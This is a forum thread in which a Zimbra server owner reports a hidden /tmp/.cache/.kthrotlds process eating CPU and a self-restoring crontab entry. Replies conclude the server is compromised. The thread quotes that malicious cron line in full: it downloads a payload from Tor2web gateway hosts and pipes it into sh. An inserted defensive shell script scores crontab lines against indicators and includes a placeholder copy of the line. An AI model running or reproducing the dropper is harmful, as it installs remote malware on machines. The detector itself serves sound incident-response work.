Zimbra /tmp/.cache/.kthrotlds 400% CPU usage
-
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
13921 zimbra 20 0 354748 11156 720 S 299.6 0.1 4:13.99 /tmp/.cache/.kthrotlds
Any idea where exactly this is running? I tried deleting the tmp folder,
but the crontab entry still keeps getting created automatically.
Where exactly is it executing? Please help.
-
@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
/tmp/.cache/.kthrotlds
in theory this is the name of the process.
-
Is the system fully updated?
-
Yes, it's updated... I had the same issue last time; I found some scripts in tmp.
I just modified inside that and it stopped for some time... now it's started again..
-
@scottalanmiller yes scott
-
This appears to be an exploit. Most likely your system has been compromised.
-
Ok, should I re-install... I have a backup.
-
@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
Ok, should I re-install... I have a backup.
Maybe.
There is one line in crontab and even when deleted, it comes back?
-
Yes, this is the entry...
*/11 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to [email protected]" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
-
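The crontab entry quoted above has a recognisable shape for a defender: a randomised sleep, curl/wget fallbacks to Tor gateway domains, and the download piped straight into sh. As an added example (not from this thread, Zimbra, or the malware itself), a small POSIX sh scorer that flags crontab lines carrying those traits; the indicator names, the threshold of two hits, and the sample crontab (with the gateway host replaced by a placeholder) are constructed assumptions:

```shell
#!/bin/sh
# Added example, not from the thread. Scores crontab lines for traits of the
# entry quoted above. Indicator names, threshold and SAMPLE_CRON are constructed.

# Constructed sample: a benign logrotate job, an entry shaped like the quoted
# one (gateway host replaced by PLACEHOLDER), and a benign curl health check.
SAMPLE_CRON=$(cat <<'EOF'
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/11 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};(curl -fsSLk https://PLACEHOLDER.tor2web.su/src/ldm||wget -q https://PLACEHOLDER.onion.sh/src/ldm)|sh &
30 3 * * * curl -s https://updates.example.com/healthcheck > /dev/null
EOF
)

# Print "<score> <indicator...>" for one crontab line (each indicator counts once).
score_cron_line() {
  line=$1; score=0; hits=""
  case "$line" in *"|sh"*|*"| sh"*|*"|bash"*|*"| bash"*) score=$((score+1)); hits="$hits pipe-to-shell";; esac
  case "$line" in *curl*|*wget*)               score=$((score+1)); hits="$hits downloader";; esac
  case "$line" in *tor2web*|*.onion.*|*d2web*) score=$((score+1)); hits="$hits tor-gateway";; esac
  case "$line" in */tmp/*|*/dev/shm/*)         score=$((score+1)); hits="$hits tmp-path";; esac
  case "$line" in */etc/hosts*)                score=$((score+1)); hits="$hits hosts-rewrite";; esac
  case "$line" in *shuf*)                      score=$((score+1)); hits="$hits jitter";; esac
  printf '%s%s\n' "$score" "$hits"
}

# Read crontab lines from stdin, print a verdict per line, then the flagged count.
# Usage on a real host: cat /etc/crontab /etc/cron.d/* /var/spool/cron/* | flag_cron_lines
flag_cron_lines() {
  flagged=0
  while IFS= read -r l; do
    case "$l" in ''|\#*) continue;; esac        # skip blanks and comments
    result=$(score_cron_line "$l")
    if [ "${result%% *}" -ge 2 ]; then
      flagged=$((flagged+1)); printf 'SUSPICIOUS %s :: %s\n' "$result" "$l"
    else
      printf 'ok (%s) :: %s\n' "$result" "$l"
    fi
  done
  echo "$flagged"
}

# Only the number of flagged lines, for scripting.
count_suspicious() { flag_cron_lines | tail -n 1; }

printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
```

A single `curl` in a cron job scores only one hit and stays "ok"; it is the combination of a downloader, a pipe into a shell and a Tor gateway that lifts the quoted entry above the threshold.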
Yeah, definitely compromised. So the biggest issue is... finding the compromise. It could be anywhere.
-
@scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
nding the compromise. It could be anywhere.
Yeah, better to install free Zimbra and restore the backup...
-
@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
@scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
nding the compromise. It could be anywhere.
Yeah, better to install free Zimbra and restore the backup...
Yeah, I think so.
-
@nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
@scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:
nding the compromise. It could be anywhere.
Yeah, better to install free Zimbra and restore the backup...
What is your OS version?